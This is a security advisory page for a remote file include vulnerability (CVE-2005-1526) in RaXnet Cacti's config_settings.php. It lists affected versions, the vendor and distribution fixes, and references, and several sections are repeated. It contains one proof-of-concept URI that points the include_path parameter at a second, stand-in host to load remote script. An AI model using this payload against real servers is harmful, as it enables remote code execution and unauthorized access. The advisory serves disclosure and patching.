RaXnet Cacti Config_Settings.PHP Remote File Include Vulnerability
BID:14028
Info
RaXnet Cacti Config_Settings.PHP Remote File Include Vulnerability
| Bugtraq ID: | 14028 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-1526 CVE-2005-1526 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 22 2005 12:00AM |
| Updated: | Mar 19 2015 09:28AM |
| Credit: | Discovery is credited to Maciej Piotr Falkiewicz. |
| Vulnerable: |
SuSE SUSE Linux Enterprise Server 9 SuSE SUSE Linux Enterprise Server 8 Siteframe Siteframe 3.2 p5 Siteframe Siteframe 3.1.9 Siteframe Siteframe 3.1.8 BETA Siteframe Siteframe 3.1.6 Siteframe Siteframe 3.1.4 Siteframe Siteframe 3.1.2 Siteframe Siteframe 3.1.1 Siteframe Siteframe 3.1 Siteframe Siteframe 3.0.2 Siteframe Siteframe 3.0.1 S.u.S.E. SuSE Linux Standard Server 8.0 S.u.S.E. SuSE Linux School Server for i386 S.u.S.E. SUSE LINUX Retail Solution 8.0 S.u.S.E. SuSE Linux Openexchange Server 4.0 S.u.S.E. Open-Enterprise-Server 9.0 S.u.S.E. Novell Linux Desktop 9.0 S.u.S.E. Linux Professional 9.3 x86_64 S.u.S.E. Linux Professional 9.3 S.u.S.E. Linux Professional 9.2 x86_64 S.u.S.E. Linux Professional 9.2 S.u.S.E. Linux Professional 9.1 x86_64 S.u.S.E. Linux Professional 9.1 S.u.S.E. Linux Professional 9.0 x86_64 S.u.S.E. Linux Professional 9.0 S.u.S.E. Linux Professional 8.2 S.u.S.E. Linux Personal 9.3 x86_64 S.u.S.E. Linux Personal 9.3 S.u.S.E. Linux Personal 9.2 x86_64 S.u.S.E. Linux Personal 9.2 S.u.S.E. Linux Personal 9.1 x86_64 S.u.S.E. Linux Personal 9.1 S.u.S.E. Linux Personal 9.0 x86_64 S.u.S.E. Linux Personal 9.0 S.u.S.E. Linux Personal 8.2 S.u.S.E. Linux Enterprise Server for S/390 9.0 S.u.S.E. Linux Desktop 1.0 Raxnet Cacti 0.8.6 d Raxnet Cacti 0.8.6 c Raxnet Cacti 0.8.6 b Raxnet Cacti 0.8.6 a Raxnet Cacti 0.8.6 Raxnet Cacti 0.8.5 a Raxnet Cacti 0.8.5 Raxnet Cacti 0.8.4 Raxnet Cacti 0.8.3 a Raxnet Cacti 0.8.3 Raxnet Cacti 0.8.2 a Raxnet Cacti 0.8.2 Raxnet Cacti 0.8.1 Raxnet Cacti 0.8 Raxnet Cacti 0.6.8 a Raxnet Cacti 0.6.8 Raxnet Cacti 0.6.7 Raxnet Cacti 0.6.6 Raxnet Cacti 0.6.5 Raxnet Cacti 0.6.4 Raxnet Cacti 0.6.3 Raxnet Cacti 0.6.2 Raxnet Cacti 0.6.1 Raxnet Cacti 0.6 Raxnet Cacti 0.5 Gentoo Linux FreeBSD FreeBSD 5.4 -RELENG FreeBSD FreeBSD 5.4 -RELEASE FreeBSD FreeBSD 5.4 -PRERELEASE FreeBSD FreeBSD 5.3 -STABLE FreeBSD FreeBSD 5.3 -RELENG FreeBSD FreeBSD 5.3 -RELEASE FreeBSD FreeBSD 5.3 FreeBSD FreeBSD 5.2.1 -RELEASE FreeBSD FreeBSD 5.2 -RELENG FreeBSD FreeBSD 5.2 -RELEASE FreeBSD FreeBSD 5.2 FreeBSD FreeBSD 5.1 -RELENG FreeBSD FreeBSD 5.1 -RELEASE/Alpha FreeBSD FreeBSD 5.1 -RELEASE-p5 FreeBSD FreeBSD 5.1 -RELEASE FreeBSD FreeBSD 5.1 FreeBSD FreeBSD 5.0 -RELENG FreeBSD FreeBSD 5.0 -RELEASE-p14 FreeBSD FreeBSD 5.0 alpha FreeBSD FreeBSD 5.0 FreeBSD FreeBSD 4.11 -STABLE FreeBSD FreeBSD 4.11 -RELENG FreeBSD FreeBSD 4.11 -RELEASE-p3 FreeBSD FreeBSD 4.10 -RELENG FreeBSD FreeBSD 4.10 -RELEASE-p8 FreeBSD FreeBSD 4.10 -RELEASE FreeBSD FreeBSD 4.10 Debian Linux 3.1 sparc Debian Linux 3.1 s/390 Debian Linux 3.1 ppc Debian Linux 3.1 mipsel Debian Linux 3.1 mips Debian Linux 3.1 m68k Debian Linux 3.1 ia-64 Debian Linux 3.1 ia-32 Debian Linux 3.1 hppa Debian Linux 3.1 arm Debian Linux 3.1 alpha Debian Linux 3.1 Debian Linux 3.0 sparc Debian Linux 3.0 s/390 Debian Linux 3.0 ppc Debian Linux 3.0 mipsel Debian Linux 3.0 mips Debian Linux 3.0 m68k Debian Linux 3.0 ia-64 Debian Linux 3.0 ia-32 Debian Linux 3.0 hppa Debian Linux 3.0 arm Debian Linux 3.0 alpha Debian Linux 3.0 Conectiva Linux 10.0 Conectiva Linux 9.0 |
| Not Vulnerable: |
Raxnet Cacti 0.8.6 e |
Discussion
RaXnet Cacti Config_Settings.PHP Remote File Include Vulnerability
RaXnet Cacti is prone to a remote file include vulnerability.
The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'config_settings.php' script.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
RaXnet Cacti is prone to a remote file include vulnerability.
The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'config_settings.php' script.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Exploit / POC
RaXnet Cacti Config_Settings.PHP Remote File Include Vulnerability
An exploit is not required.
A proof of concept URI was provided:
http://www.example.com/include/config_settings.php?config[include_path]=http://www.example2.com/
An exploit is not required.
A proof of concept URI was provided:
http://www.example.com/include/config_settings.php?config[include_path]=http://www.example2.com/
Solution / Fix
RaXnet Cacti Config_Settings.PHP Remote File Include Vulnerability
Solution:
The vendor has released version 0.8.6e to address this, and other issues.
Gentoo Linux has released advisory GLSA 200506-20 to address this, and other issues. Users of affected packages are urged to execute the following commands with superuser privileges:
emerge --sync
emerge --ask --oneshot --verbose ">=net-analyzer/cacti-0.8.6e"
Please see the referenced advisory for further information.
Conectiva Linux advisory CLSA-2005:978 is available to address various issues affecting cacti. Please see the referenced advisory for more information.
Gentoo Linux has updated advisory GLSA 200506-20 to GLSA 200506-20:02 to address this, and other issues. Users of affected packages are urged to execute the following commands with superuser privileges:
emerge --sync
emerge --ask --oneshot --verbose ">=net-analyzer/cacti-0.8.6f"
Please see the referenced advisory for further information.
Raxnet Cacti 0.5
Raxnet Cacti 0.6
Raxnet Cacti 0.6.4
Raxnet Cacti 0.6.5
Raxnet Cacti 0.6.8
Raxnet Cacti 0.6.8 a
Raxnet Cacti 0.8.2 a
Raxnet Cacti 0.8.2
Raxnet Cacti 0.8.3 a
Raxnet Cacti 0.8.3
Raxnet Cacti 0.8.4
Raxnet Cacti 0.8.6
Raxnet Cacti 0.8.6 b
Raxnet Cacti 0.8.6 d
Raxnet Cacti 0.8.6 c
Raxnet Cacti 0.8.6 a
Solution:
The vendor has released version 0.8.6e to address this, and other issues.
Gentoo Linux has released advisory GLSA 200506-20 to address this, and other issues. Users of affected packages are urged to execute the following commands with superuser privileges:
emerge --sync
emerge --ask --oneshot --verbose ">=net-analyzer/cacti-0.8.6e"
Please see the referenced advisory for further information.
Conectiva Linux advisory CLSA-2005:978 is available to address various issues affecting cacti. Please see the referenced advisory for more information.
Gentoo Linux has updated advisory GLSA 200506-20 to GLSA 200506-20:02 to address this, and other issues. Users of affected packages are urged to execute the following commands with superuser privileges:
emerge --sync
emerge --ask --oneshot --verbose ">=net-analyzer/cacti-0.8.6f"
Please see the referenced advisory for further information.
Raxnet Cacti 0.5
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.4
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.5
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.8
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.8 a
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.2 a
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.2
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.3 a
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.3
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.4
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.6
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.6 b
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.6 d
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.6 c
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.6 a
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
References
RaXnet Cacti Config_Settings.PHP Remote File Include Vulnerability
References:
References:
- Cacti Homepage (Cacti)
- CLSA-2005:978 - cacti (Conectiva)
- Release Notes - 0.8.6e (Raxnet)
- Siteframe Homepage (Siteframe)
- iDEFENSE Security Advisory 06.22.05: Multiple Vendor Cacti config_settings.php R ("iDEFENSE Labs"
)